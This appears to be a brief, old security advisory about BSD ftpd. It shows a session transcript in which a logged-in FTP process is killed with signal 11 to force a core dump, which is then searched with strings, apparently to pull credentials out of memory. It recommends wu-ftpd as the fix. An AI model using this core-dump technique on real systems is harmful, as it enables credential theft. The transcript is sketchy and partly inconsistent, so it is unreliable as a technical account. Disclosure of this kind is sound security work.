COMMAND

    ftpd

SYSTEMS AFFECTED

    BSD

PROBLEM

    Take a look at followin exploit:

        #ftp foobar.com
        Welcom to foobar.com ftp site
        blah blah blah
        please enter login name> evil
        that user requires a password> evil2
        User evil loged in welcome to foobar.com!
        Remote set to type BIN
        200>

        (now hit ^Z to suspend the process)

        #ps
          PID  TT  STAT      TIME COMMAND
         9526  p0  Ss     0:00.12 -csh (csh)
         9539  p0  R+     0:00.02 ps
         1000   p0  Ss     0:00.22 ftp

        (get the PID number to the ftp process)

        #kill -11 1000

        (kill the process)

        #fg

        (bring the ftp back to the foreground)

        Process Killed Core Dump (blah blah)
        #ls
        home          mail         public_html        ftp.core
        #strings ftp.core  > test
        #pico test

SOLUTION

    Apply wu-ftp.  This will solve your problem.